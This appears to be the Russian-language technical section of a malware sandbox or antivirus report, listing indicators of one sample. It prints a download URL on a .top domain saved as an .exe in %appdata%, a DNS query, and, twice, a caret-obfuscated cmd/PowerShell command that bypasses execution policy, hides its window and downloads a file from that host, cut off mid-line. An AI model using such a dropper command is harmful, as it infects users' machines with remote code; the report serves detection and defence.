Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWe^RSH^E^L^L^.EX^E ^-^exE^Cu^tIon^pOl^ICY^ BYpASs -Nop^RO^FI^L^E ^-wiNd^owsTYL^E ^HIdde^n (N^EW^-^oBJ^eCt sYsTem.neT.Web^cl^IE^Nt^).d^oW^NloAd^Fil^e^('http://sutraponef...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "P^OWe^RSH^E^L^L^.EX^E ^-^exE^Cu^tIon^pOl^ICY^ BYpASs -Nop^RO^FI^L^E ^-wiNd^owsTYL^E ^HIdde^n (N^EW^-^oBJ^eCt sYsTem.neT.Web^cl^IE^Nt^).d^oW^NloAd^Fil^e^('http://sutraponef...' (со скрытым окном)